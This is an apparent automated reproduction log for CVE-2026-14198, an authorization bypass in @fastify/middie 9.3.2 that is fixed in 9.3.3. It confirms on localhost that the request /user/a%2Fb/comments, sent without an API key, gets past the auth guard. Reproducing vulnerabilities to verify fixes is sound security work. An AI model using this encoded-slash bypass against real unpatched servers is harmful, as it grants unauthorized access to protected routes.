================================================================ CVE-2026-14198 reproduction: @fastify/middie encoded slash bypass run: Thu Jul 2 17:38:41 UTC 2026 ROOT=/data/pruva/runs/1097abc6-d12b-4882-a698-de4bec5dc5c5/bundle ================================================================ [workspace] using project cache: vuln=/data/pruva/project-cache/b133492c-81d6-4c5b-afbf-03b28ec1f618/repo-vuln-v932 fixed=/data/pruva/project-cache/b133492c-81d6-4c5b-afbf-03b28ec1f618/repo [versions] vulnerable @fastify/middie=9.3.2 fixed @fastify/middie=9.3.3 ---- inject harness: vulnerable-inject ---- { "label": "vulnerable-inject", "version": "9.3.2", "mode": "inject", "baseline": { "statusCode": 401, "body": "{\"error\":\"Unauthorized\"}" }, "bypass": { "statusCode": 200, "body": "{\"ok\":true,\"id\":\"a/b\"}" }, "allowed": { "statusCode": 200, "body": "{\"ok\":true,\"id\":\"a/b\"}" } } ---- real HTTP server probe: vulnerable-server (port 3198) ---- server ready (pid=35339) baseline: STATUS:401 bypass: STATUS:200 allowed: STATUS:200 ---- inject harness: fixed-inject ---- { "label": "fixed-inject", "version": "9.3.3", "mode": "inject", "baseline": { "statusCode": 401, "body": "{\"error\":\"Unauthorized\"}" }, "bypass": { "statusCode": 401, "body": "{\"error\":\"Unauthorized\"}" }, "allowed": { "statusCode": 200, "body": "{\"ok\":true,\"id\":\"a/b\"}" } } ---- real HTTP server probe: fixed-server (port 3199) ---- server ready (pid=35393) baseline: STATUS:401 bypass: STATUS:401 allowed: STATUS:200 ================================================================ RESULT SUMMARY inject vuln: baseline=401 bypass=200 allowed=200 inject fixed: baseline=401 bypass=401 allowed=200 server vuln: baseline=401 bypass=200 server fixed: baseline=401 bypass=401 ================================================================ VERDICT: CONFIRMED - vulnerable build bypassed, fixed build blocked. runtime_manifest written: /data/pruva/runs/1097abc6-d12b-4882-a698-de4bec5dc5c5/bundle/repro/runtime_manifest.json { "entrypoint_kind": "library_api", "entrypoint_detail": "Fastify app.inject + real 127.0.0.1 HTTP server exercising @fastify/middie auth guard on /user/:id/comments with encoded slash %2F in the :id parameter", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "node", "fastify", "@fastify/middie" ], "proof_artifacts": [ "logs/reproduction_steps.log", "artifacts/inject_vuln.json", "artifacts/inject_fixed.json", "logs/inject_vuln.log", "logs/inject_fixed.log", "artifacts/http/vuln/server.log", "artifacts/http/vuln/responses.txt", "artifacts/http/fixed/server.log", "artifacts/http/fixed/responses.txt" ], "confirmed": true, "evidence": { "vulnerable_version": "9.3.2", "fixed_version": "9.3.3", "inject_bypass_status_vulnerable": 200, "inject_bypass_status_fixed": 401, "server_bypass_status_vulnerable": 200, "server_bypass_status_fixed": 401 }, "notes": "Vulnerable build returns 200 (handler reached, auth guard bypassed) for /user/a%2Fb/comments without x-api-key; fixed build returns 401 (guard matches). Demonstrated via Fastify app.inject (library_api) and a real 127.0.0.1 HTTP server with a raw node http client that preserves %2F." } reproduction_steps.sh: SUCCESS (exit 0)